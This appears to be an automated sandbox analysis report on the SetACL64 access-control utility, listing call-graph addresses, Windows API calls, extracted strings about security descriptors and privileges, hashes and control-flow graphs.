43395->43398 43404 7ff686844037 ctype 43396->43404 43399 7ff68684441e 43397->43399 43401 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43398->43401 43402 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43399->43402 43400->43384 43400->43385 43400->43392 43403 7ff6868443ee 43401->43403 43405 7ff686844424 43402->43405 43409 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43403->43409 43404->43399 43404->43405 43406 7ff686833f80 35 API calls 43404->43406 43413 7ff6868441d3 ctype 43404->43413 43408 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43405->43408 43407 7ff686844105 43406->43407 43411 7ff686833f80 35 API calls 43407->43411 43412 7ff68684442a 43408->43412 43415 7ff6868443f4 43409->43415 43410 7ff686844314 43414 7ff686844331 43410->43414 43417 7ff68685e4b0 92 API calls 43410->43417 43425 7ff686844135 ctype 43411->43425 43418 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43412->43418 43416 7ff68685e4b0 92 API calls 43413->43416 43421 7ff686844268 43413->43421 43426 7ff686844356 43413->43426 43419 7ff68685e4b0 92 API calls 43414->43419 43424 7ff686844352 43414->43424 43414->43426 43420 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43415->43420 43416->43413 43417->43414 43422 7ff686844430 43418->43422 43419->43424 43420->43364 43421->43410 43423 7ff68685e4b0 92 API calls 43421->43423 43421->43426 43423->43421 43424->43426 43428 7ff68684a350 254 API calls 43424->43428 43425->43385 43425->43412 43425->43413 43427 7ff686862180 _handle_error 8 API calls 43426->43427 43429 7ff6868443c0 43427->43429 43428->43426 43430 7ff68686e500 43431 7ff68686e51d 43430->43431 43432 7ff68686e50e GetLastError ExitThread 43430->43432 43433 7ff686873e64 _Tolower 16 API calls 43431->43433 43434 7ff68686e522 43433->43434 43443 7ff68687a9d0 43434->43443 43437 7ff68686e53b 43447 7ff68683e8c0 43437->43447 43439 7ff68686e550 43461 7ff68686e700 43439->43461 43444 7ff68686e52e 43443->43444 43445 7ff68687a9e0 43443->43445 43444->43437 43460 7ff6868781f0 5 API calls try_get_function 43444->43460 43445->43444 43464 7ff686877bc0 43445->43464 43448 7ff68683e8d7 ctype 43447->43448 43449 7ff68683e9ee ctype 43448->43449 43450 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43448->43450 43449->43439 43451 7ff68683ea15 43450->43451 43452 7ff68683ea29 43451->43452 43453 7ff68683ea3c 43451->43453 43467 7ff68683d760 WaitForSingleObject 43452->43467 43495 7ff686864c18 RtlPcToFileHeader RaiseException 43453->43495 43456 7ff68683ea59 43458 7ff68686e700 17 API calls 43459 7ff68683ea35 43458->43459 43459->43439 43460->43437 43497 7ff68686e568 43461->43497 43465 7ff686877998 try_get_function 5 API calls 43464->43465 43466 7ff686877be8 43465->43466 43466->43444 43468 7ff68683d8a6 ReleaseMutex 43467->43468 43475 7ff68683d8d4 ctype 43467->43475 43469 7ff68683da41 ResetEvent 43468->43469 43468->43475 43470 7ff68683da48 WaitForSingleObject 43469->43470 43471 7ff68683da5f ReleaseMutex 43470->43471 43470->43475 43483 7ff68683dab8 ctype 43471->43483 43472 7ff68683e853 43473 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43472->43473 43476 7ff68683e859 43473->43476 43474 7ff68683da02 ctype 43477 7ff686862180 _handle_error 8 API calls 43474->43477 43475->43472 43475->43474 43481 7ff68683e84e 43475->43481 43489 7ff68683e865 43475->43489 43484 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43476->43484 43478 7ff68683da16 43477->43478 43478->43458 43480 7ff6868688fc 31 API calls _invalid_parameter_noinfo_noreturn 43480->43489 43482 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43481->43482 43482->43472 43483->43475 43486 7ff68683dac1 EnterCriticalSection 43483->43486 43485 7ff68683e85f 43484->43485 43487 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43485->43487 43490 7ff68683db20 CloseHandle 43486->43490 43487->43489 43488 7ff68683e88e 43489->43480 43489->43488 43496 7ff686833e30 33 API calls 43489->43496 43493 7ff68683e826 43490->43493 43494 7ff68683e8c0 36 API calls 43493->43494 43494->43481 43495->43456 43506 7ff686873fe0 GetLastError 43497->43506 43499 7ff68686e579 43500 7ff68686e5c0 ExitThread 43499->43500 43501 7ff68686e595 43499->43501 43529 7ff686878230 5 API calls try_get_function 43499->43529 43503 7ff68686e5a9 43501->43503 43504 7ff68686e5a3 CloseHandle 43501->43504 43503->43500 43505 7ff68686e5b7 FreeLibraryAndExitThread 43503->43505 43504->43503 43505->43500 43507 7ff686874002 43506->43507 43508 7ff686874007 43506->43508 43530 7ff686877e14 6 API calls try_get_function 43507->43530 43513 7ff68687400f SetLastError 43508->43513 43531 7ff686877e5c 6 API calls try_get_function 43508->43531 43511 7ff68687402a 43512 7ff686874fdc _Tolower 12 API calls 43511->43512 43511->43513 43515 7ff68687403d 43512->43515 43513->43499 43516 7ff68687405b 43515->43516 43517 7ff68687404b 43515->43517 43533 7ff686877e5c 6 API calls try_get_function 43516->43533 43532 7ff686877e5c 6 API calls try_get_function 43517->43532 43520 7ff686874052 43524 7ff686875054 __free_lconv_num 12 API calls 43520->43524 43521 7ff686874063 43522 7ff686874079 43521->43522 43523 7ff686874067 43521->43523 43535 7ff686873c14 14 API calls _Tolower 43522->43535 43534 7ff686877e5c 6 API calls try_get_function 43523->43534 43524->43513 43527 7ff686874081 43528 7ff686875054 __free_lconv_num 12 API calls 43527->43528 43528->43513 43529->43501 43531->43511 43532->43520 43533->43521 43534->43520 43535->43527 43536 7ff68683d304 43537 7ff68683d310 43536->43537 43538 7ff68683d65f LeaveCriticalSection 43536->43538 43537->43538 43539 7ff68683d326 43537->43539 43540 7ff68683d659 43538->43540 43541 7ff68683d35b 43539->43541 43542 7ff68683d330 GetSystemTimeAsFileTime 43539->43542 43543 7ff68683d6a0 ctype 43540->43543 43549 7ff68683d74d 43540->43549 43544 7ff68683d36f 43541->43544 43545 7ff68683d35f GetCurrentThreadId 43541->43545 43542->43541 43546 7ff68683d6d9 ctype 43543->43546 43551 7ff68683d753 43543->43551 43547 7ff68683d527 LeaveCriticalSection 43544->43547 43548 7ff68683d377 GetUserNameExW 43544->43548 43545->43544 43552 7ff686862180 _handle_error 8 API calls 43546->43552 43550 7ff6868621d4 std::_Facet_Register 5 API calls 43547->43550 43553 7ff68683d3b9 43548->43553 43554 7ff68683d3a6 GetLastError 43548->43554 43555 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43549->43555 43556 7ff68683d53a 43550->43556 43557 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43551->43557 43558 7ff68683d727 43552->43558 43586 7ff686835790 35 API calls 3 library calls 43553->43586 43554->43553 43570 7ff68683d452 ctype 43554->43570 43555->43551 43560 7ff68683d5cc 43556->43560 43567 7ff686833f80 35 API calls 43556->43567 43561 7ff68683d759 43557->43561 43563 7ff68683d605 43560->43563 43568 7ff686833f80 35 API calls 43560->43568 43562 7ff68683d3c9 GetUserNameExW 43564 7ff68683d3e6 GetLastError 43562->43564 43565 7ff68683d3f0 43562->43565 43569 7ff68683d627 43563->43569 43571 7ff686833f80 35 API calls 43563->43571 43566 7ff68683d417 43564->43566 43574 7ff686833f80 35 API calls 43565->43574 43566->43570 43578 7ff68683d748 43566->43578 43567->43560 43568->43563 43572 7ff68683d649 43569->43572 43577 7ff686833f80 35 API calls 43569->43577 43570->43547 43587 7ff68682a740 36 API calls 2 library calls 43570->43587 43571->43569 43589 7ff68683ea60 9 API calls std::_Facet_Register 43572->43589 43574->43566 43576 7ff68683d51b 43588 7ff686829720 31 API calls 2 library calls 43576->43588 43577->43572 43580 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 43578->43580 43579 7ff68683d4ee 43579->43576 43585 7ff686833f80 35 API calls 43579->43585 43580->43549 43582 7ff68683d4b5 43582->43576 43582->43579 43584 7ff686833f80 35 API calls 43582->43584 43583 7ff68683d526 43583->43547 43584->43579 43585->43576 43586->43562 43587->43582 43588->43583 43589->43540
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$Information$Delete$Valid$FreeLocal$CopyLength
                                        • String ID: > because a filter keyword matched.$> failed with: $Omitting ACL of: <$Processing ACL of: <$Reading the SD from <$SetEntriesInAcl for DACL of <$SetEntriesInAcl for SACL of <$Write2SD$Writing SD to <
                                        • API String ID: 3366768055-1688761767
                                        • Opcode ID: 8c702df0ce635fb3871e4a0553cb4715271af5242ae0ef260948fefd7f14e07d
                                        • Instruction ID: 6d925ab288e5e114c3f70b8b71343917f812444a879e869c0a8dac5510dd36b1
                                        • Opcode Fuzzy Hash: 8c702df0ce635fb3871e4a0553cb4715271af5242ae0ef260948fefd7f14e07d
                                        • Instruction Fuzzy Hash: 5F33C1B2A18782C5EB208F25D8483FD23A5FF44798F405139DA5D87AE9DF79E984C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$Close$EnumLockitSimpleString::operator=std::_$ConnectCreateLockit::_Lockit::~_OpenRegistrySetgloballocalestd::locale::_
                                        • String ID: RegKeyFixPathAndOpen$Unintentionally the following registry key was created: <$classes_root$current_user$hkcr$hkcu$hkey_classes_root$hkey_current_user$hkey_local_machine$hkey_users$hklm$hku$machine$users
                                        • API String ID: 2754268630-3593729730
                                        • Opcode ID: 706d74c401a7eba7e1d9deaebb3a5822d64d4f896357cd9c5b521f9506353fbc
                                        • Instruction ID: f41443ad83dc2b942af6477adcf1c35fbf48749d131eb586d42823c96d2cc871
                                        • Opcode Fuzzy Hash: 706d74c401a7eba7e1d9deaebb3a5822d64d4f896357cd9c5b521f9506353fbc
                                        • Instruction Fuzzy Hash: C2F2B0A2B09B52C5EB20DB65D4402BD33A5FF84B88F444139DA4D977A9EFBED844C360
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastSecurity$Valid$AbsoluteCloseKernelMakeObject$CreateDescriptorFileFreeHandleInfoLocalNamed
                                        • String ID: SeSecurityPrivilege
                                        • API String ID: 3247214862-2333288578
                                        • Opcode ID: 054ea4d1a2d6c0b3adbe8e4b57b4ca5633b3a582fabd17bd529d99db77766a5b
                                        • Instruction ID: edb9810a3074a850746ac64d15d38870c9d3946d00b1f313f91ea40711b06da2
                                        • Opcode Fuzzy Hash: 054ea4d1a2d6c0b3adbe8e4b57b4ca5633b3a582fabd17bd529d99db77766a5b
                                        • Instruction Fuzzy Hash: FA42A1A2B19742C6FB149B65D4483AD23A2FF44B88F404139DB4E97BA5DF7EE890C350

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2473 7ff686843a5e-7ff686843a8e AdjustTokenPrivileges 2474 7ff686843aa9-7ff686843abc GetLastError CloseHandle 2473->2474 2475 7ff686843a90-7ff686843a98 GetLastError 2473->2475 2476 7ff686843abd-7ff686843ac6 2474->2476 2475->2474 2477 7ff686843a9a-7ff686843aa7 CloseHandle 2475->2477 2478 7ff686843ac8-7ff686843adf 2476->2478 2479 7ff686843aff-7ff686843b1b 2476->2479 2477->2476 2482 7ff686843afa call 7ff6868621a0 2478->2482 2483 7ff686843ae1-7ff686843af4 2478->2483 2480 7ff686843b1d-7ff686843b34 2479->2480 2481 7ff686843b54-7ff686843b56 2479->2481 2484 7ff686843b36-7ff686843b49 2480->2484 2485 7ff686843b4f call 7ff6868621a0 2480->2485 2486 7ff686843b5c-7ff686843be2 call 7ff686833f80 * 2 call 7ff68683d260 2481->2486 2487 7ff686843c5e-7ff686843d83 call 7ff686833f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 2481->2487 2482->2479 2483->2482 2488 7ff6868443fb-7ff686844400 call 7ff6868688fc 2483->2488 2484->2485 2490 7ff686844401-7ff686844406 call 7ff6868688fc 2484->2490 2485->2481 2514 7ff686843c1c-7ff686843c25 2486->2514 2515 7ff686843be4-7ff686843bfb 2486->2515 2512 7ff686843dbc-7ff686843dd8 2487->2512 2513 7ff686843d85-7ff686843d9c 2487->2513 2488->2490 2502 7ff686844407-7ff68684440c call 7ff6868688fc 2490->2502 2511 7ff68684440d-7ff686844412 call 7ff6868688fc 2502->2511 2539 7ff686844413-7ff686844418 call 7ff6868688fc 2511->2539 2520 7ff686843dda-7ff686843df1 2512->2520 2521 7ff686843e11-7ff686843e13 2512->2521 2518 7ff686843db7 call 7ff6868621a0 2513->2518 2519 7ff686843d9e-7ff686843db1 2513->2519 2514->2487 2516 7ff686843c27-7ff686843c3e 2514->2516 2522 7ff686843c16-7ff686843c1b call 7ff6868621a0 2515->2522 2523 7ff686843bfd-7ff686843c10 2515->2523 2527 7ff686843c59 call 7ff6868621a0 2516->2527 2528 7ff686843c40-7ff686843c53 2516->2528 2518->2512 2519->2511 2519->2518 2531 7ff686843e0c call 7ff6868621a0 2520->2531 2532 7ff686843df3-7ff686843e06 2520->2532 2525 7ff686843e19-7ff686843e9f call 7ff686833f80 * 2 call 7ff68683d260 2521->2525 2526 7ff686843f1b-7ff686844040 call 7ff686833f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 2521->2526 2522->2514 2523->2502 2523->2522 2563 7ff686843ed9-7ff686843ee2 2525->2563 2564 7ff686843ea1-7ff686843eb8 2525->2564 2561 7ff686844079-7ff686844095 2526->2561 2562 7ff686844042-7ff686844059 2526->2562 2527->2487 2528->2527 2537 7ff6868443dd-7ff6868443fa call 7ff6868688fc * 5 2528->2537 2531->2521 2532->2531 2532->2539 2537->2488 2550 7ff686844419-7ff68684441e call 7ff6868688fc 2539->2550 2565 7ff68684441f-7ff686844424 call 7ff6868688fc 2550->2565 2569 7ff686844097-7ff6868440ae 2561->2569 2570 7ff6868440ce-7ff6868440d0 2561->2570 2567 7ff68684405b-7ff68684406e 2562->2567 2568 7ff686844074 call 7ff6868621a0 2562->2568 2563->2526 2574 7ff686843ee4-7ff686843efb 2563->2574 2571 7ff686843eba-7ff686843ecd 2564->2571 2572 7ff686843ed3-7ff686843ed8 call 7ff6868621a0 2564->2572 2586 7ff686844425-7ff68684442a call 7ff6868688fc 2565->2586 2567->2565 2567->2568 2568->2561 2579 7ff6868440c9 call 7ff6868621a0 2569->2579 2580 7ff6868440b0-7ff6868440c3 2569->2580 2582 7ff6868441d8-7ff686844209 2570->2582 2583 7ff6868440d6-7ff68684415c call 7ff686833f80 * 2 call 7ff68683d260 2570->2583 2571->2550 2571->2572 2572->2563 2575 7ff686843f16 call 7ff6868621a0 2574->2575 2576 7ff686843efd-7ff686843f10 2574->2576 2575->2526 2576->2537 2576->2575 2579->2570 2580->2579 2580->2586 2587 7ff686844268-7ff686844294 2582->2587 2588 7ff68684420b-7ff68684420e 2582->2588 2635 7ff686844196-7ff68684419f 2583->2635 2636 7ff68684415e-7ff686844175 2583->2636 2608 7ff68684442b-7ff686844430 call 7ff6868688fc 2586->2608 2597 7ff686844296-7ff686844299 2587->2597 2598 7ff686844314-7ff686844320 2587->2598 2595 7ff686844210-7ff686844220 2588->2595 2601 7ff686844239-7ff686844266 2595->2601 2602 7ff686844222-7ff686844233 call 7ff68685e4b0 2595->2602 2606 7ff6868442a0-7ff6868442b4 2597->2606 2603 7ff686844335-7ff686844341 2598->2603 2604 7ff686844322-7ff68684432c call 7ff68685e4b0 2598->2604 2601->2587 2601->2595 2602->2601 2628 7ff686844356-7ff68684435b 2602->2628 2611 7ff68684435d-7ff686844367 call 7ff686844810 2603->2611 2612 7ff686844343-7ff686844354 call 7ff68685e4b0 2603->2612 2619 7ff686844331-7ff686844333 2604->2619 2614 7ff6868442b6-7ff6868442c7 call 7ff68685e4b0 2606->2614 2615 7ff6868442cd-7ff6868442d2 2606->2615 2637 7ff686844369-7ff686844372 2611->2637 2638 7ff6868443b1-7ff6868443dc call 7ff686862180 2611->2638 2612->2611 2612->2628 2614->2615 2614->2628 2624 7ff6868442ea-7ff686844312 2615->2624 2625 7ff6868442d4-7ff6868442e8 call 7ff68685e4b0 2615->2625 2619->2603 2619->2628 2624->2598 2624->2606 2625->2624 2625->2628 2628->2638 2635->2582 2644 7ff6868441a1-7ff6868441b8 2635->2644 2639 7ff686844177-7ff68684418a 2636->2639 2640 7ff686844190-7ff686844195 call 7ff6868621a0 2636->2640 2641 7ff68684439e-7ff6868443a1 2637->2641 2642 7ff686844374-7ff686844396 call 7ff68684a350 2637->2642 2639->2608 2639->2640 2640->2635 2650 7ff6868443af 2641->2650 2651 7ff6868443a3-7ff6868443aa call 7ff68685b2b0 2641->2651 2642->2638 2656 7ff686844398 2642->2656 2648 7ff6868441ba-7ff6868441cd 2644->2648 2649 7ff6868441d3 call 7ff6868621a0 2644->2649 2648->2537 2648->2649 2649->2582 2650->2638 2651->2650 2656->2641
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                        • String ID: Prepare$Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeRestorePrivilege$SeTakeOwnershipPrivilege
                                        • API String ID: 637398405-1541018277
                                        • Opcode ID: 784cef284bd62b761dc482660273cd6918b6e7e394081ec7e667ddc71951a65c
                                        • Instruction ID: 7297aa4543ed2d95f5a876edb80cd7939455c8c289724e75e36796354c795d8c
                                        • Opcode Fuzzy Hash: 784cef284bd62b761dc482660273cd6918b6e7e394081ec7e667ddc71951a65c
                                        • Instruction Fuzzy Hash: ED22A5B2A18782C2EE10CB55E4483696365FF847E4F505139E69D87AE9DFBEE880C710

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2657 7ff68685e4b0-7ff68685e4f4 2658 7ff68685e4f6-7ff68685e4fb call 7ff68686d6ac 2657->2658 2659 7ff68685e4ff-7ff68685e507 2657->2659 2658->2659 2661 7ff68685e50c-7ff68685e519 ConvertStringSidToSidW 2659->2661 2662 7ff68685e509 2659->2662 2664 7ff68685e53b-7ff68685e574 2661->2664 2665 7ff68685e51b-7ff68685e536 call 7ff68685ec20 LocalFree 2661->2665 2662->2661 2666 7ff68685e576 2664->2666 2667 7ff68685e579-7ff68685e583 2664->2667 2675 7ff68685ebc8-7ff68685ebee call 7ff686862180 2665->2675 2666->2667 2669 7ff68685e6fd-7ff68685e708 call 7ff68685f9c0 2667->2669 2670 7ff68685e589-7ff68685e597 2667->2670 2680 7ff68685e70a-7ff68685e71c 2669->2680 2681 7ff68685e720-7ff68685e762 call 7ff686833f80 call 7ff686834750 2669->2681 2673 7ff68685e599 2670->2673 2674 7ff68685e5b3 2670->2674 2677 7ff68685e5a0-7ff68685e5a4 2673->2677 2678 7ff68685e5b6-7ff68685e5b9 2674->2678 2677->2678 2682 7ff68685e5a6-7ff68685e5b1 2677->2682 2678->2669 2683 7ff68685e5bf-7ff68685e5c8 2678->2683 2680->2681 2702 7ff68685e79a-7ff68685e7b0 2681->2702 2703 7ff68685e764-7ff68685e77a 2681->2703 2682->2674 2682->2677 2683->2669 2686 7ff68685e5ce-7ff68685e5d5 2683->2686 2688 7ff68685e5d7-7ff68685e5dc 2686->2688 2689 7ff68685e5e1-7ff68685e602 2686->2689 2691 7ff68685eb3d-7ff68685eb41 2688->2691 2692 7ff68685e607-7ff68685e618 call 7ff686833f80 2689->2692 2693 7ff68685e604 2689->2693 2694 7ff68685eb7d-7ff68685eb92 2691->2694 2695 7ff68685eb43-7ff68685eb59 2691->2695 2705 7ff68685e61a-7ff68685e630 2692->2705 2706 7ff68685e650-7ff68685e67a 2692->2706 2693->2692 2700 7ff68685ebc6 2694->2700 2701 7ff68685eb94-7ff68685ebaa 2694->2701 2698 7ff68685eb5b-7ff68685eb6e 2695->2698 2699 7ff68685eb74-7ff68685eb79 call 7ff6868621a0 2695->2699 2698->2699 2707 7ff68685ec19-7ff68685ec1f call 7ff6868688fc 2698->2707 2699->2694 2700->2675 2709 7ff68685ebac-7ff68685ebbf 2701->2709 2710 7ff68685ebc1 call 7ff6868621a0 2701->2710 2713 7ff68685e7f2 2702->2713 2714 7ff68685e7b2-7ff68685e7eb call 7ff686860c18 call 7ff686835cf0 2702->2714 2711 7ff68685e77c-7ff68685e78f 2703->2711 2712 7ff68685e795 call 7ff6868621a0 2703->2712 2715 7ff68685e64b call 7ff6868621a0 2705->2715 2716 7ff68685e632-7ff68685e645 2705->2716 2719 7ff68685ebf5-7ff68685ebfa call 7ff686829910 2706->2719 2720 7ff68685e680-7ff68685e695 2706->2720 2709->2710 2722 7ff68685ebef-7ff68685ebf4 call 7ff6868688fc 2709->2722 2710->2700 2711->2712 2724 7ff68685ebfb-7ff68685ec00 call 7ff6868688fc 2711->2724 2712->2702 2721 7ff68685e7f6 2713->2721 2714->2721 2766 7ff68685e7ed-7ff68685e7f0 2714->2766 2715->2706 2716->2715 2727 7ff68685ec13-7ff68685ec18 call 7ff6868688fc 2716->2727 2719->2724 2732 7ff68685e69a-7ff68685e6b5 call 7ff686833f80 2720->2732 2733 7ff68685e697 2720->2733 2734 7ff68685e7f9-7ff68685e7fd 2721->2734 2722->2719 2746 7ff68685ec01-7ff68685ec06 call 7ff6868688fc 2724->2746 2727->2707 2755 7ff68685e6ed-7ff68685e6f9 2732->2755 2756 7ff68685e6b7-7ff68685e6cd 2732->2756 2733->2732 2742 7ff68685e823-7ff68685e826 2734->2742 2743 7ff68685e7ff-7ff68685e802 2734->2743 2749 7ff68685e82c-7ff68685e875 call 7ff686829520 * 2 2742->2749 2750 7ff68685e9c4 2742->2750 2743->2742 2748 7ff68685e804-7ff68685e810 2743->2748 2767 7ff68685ec07-7ff68685ec0c call 7ff6868688fc 2746->2767 2748->2742 2768 7ff68685e812-7ff68685e81d 2748->2768 2774 7ff68685e87a-7ff68685e89c DsGetDcNameW 2749->2774 2775 7ff68685e877 2749->2775 2752 7ff68685e9c7-7ff68685e9ea call 7ff68685f3c0 2750->2752 2765 7ff68685e9ef-7ff68685e9f5 2752->2765 2755->2669 2761 7ff68685e6e8 call 7ff6868621a0 2756->2761 2762 7ff68685e6cf-7ff68685e6e2 2756->2762 2761->2755 2762->2727 2762->2761 2771 7ff68685e9fb-7ff68685ea00 2765->2771 2772 7ff68685eaa3-7ff68685eaab 2765->2772 2766->2734 2789 7ff68685ec0d-7ff68685ec12 call 7ff6868688fc 2767->2789 2768->2742 2778 7ff68685ea1d-7ff68685ea22 2771->2778 2779 7ff68685ea02-7ff68685ea18 call 7ff68685f3c0 2771->2779 2776 7ff68685eaad-7ff68685eac3 2772->2776 2777 7ff68685eae4-7ff68685eaec 2772->2777 2783 7ff68685e912-7ff68685e91a 2774->2783 2784 7ff68685e89e-7ff68685e8a3 2774->2784 2775->2774 2781 7ff68685eac5-7ff68685ead8 2776->2781 2782 7ff68685eade-7ff68685eae3 call 7ff6868621a0 2776->2782 2787 7ff68685eb24-7ff68685eb39 2777->2787 2788 7ff68685eaee-7ff68685eb04 2777->2788 2778->2772 2786 7ff68685ea24-7ff68685ea6a call 7ff686833f80 call 7ff68685f3c0 2778->2786 2779->2772 2781->2782 2781->2789 2782->2777 2790 7ff68685e91c-7ff68685e92e 2783->2790 2791 7ff68685e951-7ff68685e964 2783->2791 2793 7ff68685e8a6-7ff68685e8ae 2784->2793 2786->2772 2821 7ff68685ea6c-7ff68685ea82 2786->2821 2787->2691 2796 7ff68685eb06-7ff68685eb19 2788->2796 2797 7ff68685eb1f call 7ff6868621a0 2788->2797 2789->2727 2799 7ff68685e94c call 7ff6868621a0 2790->2799 2800 7ff68685e930-7ff68685e943 2790->2800 2801 7ff68685e966-7ff68685e981 call 7ff686833f80 2791->2801 2802 7ff68685e982-7ff68685e98a 2791->2802 2793->2793 2804 7ff68685e8b0-7ff68685e909 call 7ff686833f80 call 7ff68682fe30 call 7ff68683eaf0 2793->2804 2796->2727 2796->2797 2797->2787 2799->2791 2800->2746 2808 7ff68685e949 2800->2808 2801->2802 2802->2752 2812 7ff68685e98c-7ff68685e9a2 2802->2812 2804->2783 2830 7ff68685e90b-7ff68685e911 NetApiBufferFree 2804->2830 2808->2799 2816 7ff68685e9bd-7ff68685e9c2 call 7ff6868621a0 2812->2816 2817 7ff68685e9a4-7ff68685e9b7 2812->2817 2816->2752 2817->2789 2817->2816 2824 7ff68685ea9d-7ff68685eaa2 call 7ff6868621a0 2821->2824 2825 7ff68685ea84-7ff68685ea97 2821->2825 2824->2772 2825->2767 2825->2824 2830->2783
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$ErrorFreeLastLockitNamestd::_$AccountBufferConvertLocalLockit::_Lockit::~_LookupSetgloballocaleStringstd::locale::_
                                        • String ID: computername
                                        • API String ID: 1703289946-1800712684
                                        • Opcode ID: 16028561b5196d3668939a84b08cd2e3c1b912715faf0080cf177397a5bfcfa2
                                        • Instruction ID: 898f2eeaf6843ea59616fa1c987da8b1c1ca5a90c25562f0e3334e17b6b24c0e
                                        • Opcode Fuzzy Hash: 16028561b5196d3668939a84b08cd2e3c1b912715faf0080cf177397a5bfcfa2
                                        • Instruction Fuzzy Hash: E72290A2B14B52C6FB008B68E84D3AD2371BF44798F405639DE5E97AD9DF39E841C320

